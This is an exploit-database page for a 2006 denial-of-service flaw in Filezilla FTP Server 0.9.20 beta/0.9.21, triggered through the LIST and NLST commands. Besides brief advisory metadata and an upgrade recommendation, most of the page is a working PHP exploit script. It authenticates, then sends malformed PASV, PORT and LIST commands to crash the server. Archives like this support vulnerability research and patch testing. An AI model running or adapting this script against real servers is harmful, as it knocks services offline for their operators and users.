header-logo
Suggest Exploit
vendor:
Filezilla FTP Server
by:
shinnai
7,5
CVSS
HIGH
Denial of Service
N/A
CWE
Product Name: Filezilla FTP Server
Affected Version From: 0.9.20 beta
Affected Version To: 0.9.21
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP Professional SP2
2006

Filezilla FTP Server 0.9.20 beta / 0.9.21 “LIST”, “NLST” and “NLST -al” Denial Of Service

A vulnerability exists in Filezilla FTP Server 0.9.20 beta / 0.9.21 which allows an attacker to cause a denial of service by sending a specially crafted LIST, NLST or NLST -al command. This can be exploited by an authenticated user with only read and list permissions enabled.

Mitigation:

Upgrade to the latest version of Filezilla FTP Server.
Source

Exploit-DB raw data:

<?php

# Filezilla FTP Server 0.9.20 beta / 0.9.21 "LIST", "NLST" and "NLST -al" Denial Of Service
# by shinnai
# mail: shinnai[at]autistici[dot[org]
# site: http://shinnai.altervista.org
#
# special thanks to rgod for his first advisory about "STOR" Denial of service, see: http://retrogod.altervista.org/filezilla_0921_dos.html
# and for code in php I never could write alone ;)
# This one works fine also with an user with only read and list permissions enabled
# you can change the LIST command also with NLST or NLST -al comamnds

# tested on Windows XP Professional SP2 all patched

error_reporting(E_ALL);

$service_port = getservbyname('ftp', 'tcp');
$address = gethostbyname('127.0.0.1');

$user="test";
$pass="test";

$junk.="A*";

$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket < 0) {
  echo "socket_create() failed:\n reason: " . socket_strerror($socket) . "\n";
} else {
  echo "OK.\n";
}

$result = socket_connect($socket, $address, $service_port);
if ($result < 0) {
  echo "socket_connect() failed:\n reason: ($result) " . socket_strerror($result) . "\n";
} else {
  echo "OK.\n";
}

$out=socket_read($socket, 240);
echo $out;

$in = "USER ".$user."\r\n";
socket_write($socket, $in, strlen ($in));

$out=socket_read($socket, 80);
echo $out;

$in = "PASS ".$pass."\r\n";
socket_write($socket, $in, strlen ($in));

$out=socket_read($socket, 80);
echo $out;

$in = "PASV ".$junk."\r\n";
socket_write($socket, $in, strlen ($in));

$in = "PORT ".$junk."\r\n";
socket_write($socket, $in, strlen ($in));

$in = "LIST ".$junk."\r\n";
socket_write($socket, $in, strlen ($in));

socket_close($socket);

?>

# milw0rm.com [2006-12-11]

Navigation

Suggest Exploit

Services By CQR